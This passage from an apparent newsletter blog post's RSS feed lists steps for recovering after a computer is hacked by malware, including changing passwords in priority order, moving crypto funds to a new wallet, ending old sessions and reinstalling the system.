nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><h2 id="h-what-to-do-or-how-to-not-get-cooked" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What to do (or how to not get cooked)</h2><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/67b8d90695f643a0b8e3e65421333e8833a67d2d61aee447442efecbacf1bd29.png" alt="Don&apos;t panic" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="">Don&apos;t panic</figcaption></figure><ol><li><p>Don’t panic. Drink water. Breath.</p><blockquote><p>You have time and effort to solve problems. Let&apos;s go</p></blockquote></li><li><p>Don’t open crypto wallets, don’t copy passwords</p></li><li><p>Turn off the infected machine. The code may be sending the data, which takes time and bandwidth</p></li><li><p>Get a second laptop or PC, or at least your phone - you’re going to have a long night. iPad or any other tablet will work too</p><blockquote><p>Now consider that they hacked everything at all - passwords, mail, wallets, accounts. Remember, they (hackers) can use your session keys to use accounts without notifications from the apps</p></blockquote></li><li><p>Write a list of the most important stuff to the least important stuff. You’ll be changing passwords for weeks maybe. Your password manager, mail, google, apple, and crypto wallets are top-tier</p></li><li><p>Monitor your mail. You&apos;ll get an email after changing your password - don&apos;t freak out about it and delete it so you don&apos;t freak out about it later wondering if you changed your password or someone else changed it</p></li><li><p>Generate a wallet on a secure machine and send money to it from a probably hacked wallet. You can even do this from your phone, sometimes it is even faster</p></li><li><p>Start changing passwords according to the list. First, the most important thing is where you can access the accounts from. In parallel, you can connect two-factor authentication if it was not enabled somewhere. Also, do not forget in the account settings to end the sessions of the hacked device</p></li><li><p>Once you&apos;re done - I suggest you completely reinstall the system on your working machine. Trust me as a programmer - no rollback is safe enough</p></li><li><p>BONUS: The internal tension will probably break you down, find someone to share the problem with who can tell you what to do</p></li></ol><h2 id="h-top-tier-advice" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Top-tier advice</h2><blockquote><p>Separate the code into the one you can trust and cannot trust</p><p>Run any untrusted code in a Virtual Machine (not sandbox)</p><p>The same works in programming, I am now very critical of everything I work with</p></blockquote><h2 id="h-give-me-privacy-or-give-me-death" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Give me privacy or give me death.</h2><h2 id="h-be-safe-peace" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Be safe. Peace ✌️</h2>]]></content:encoded>
            <author>t-damer@newsletter.paragraph.com (Dan 🟡)</author>
            <enclosure url="https://storage.googleapis.com/papyrus_images/bca1c5937de6f7c9c073cda238188aba21e0152967cce13b9647a40c2ffd1547.png" length="0" type="image/png"/>
        </item>
    </channel>
</rss>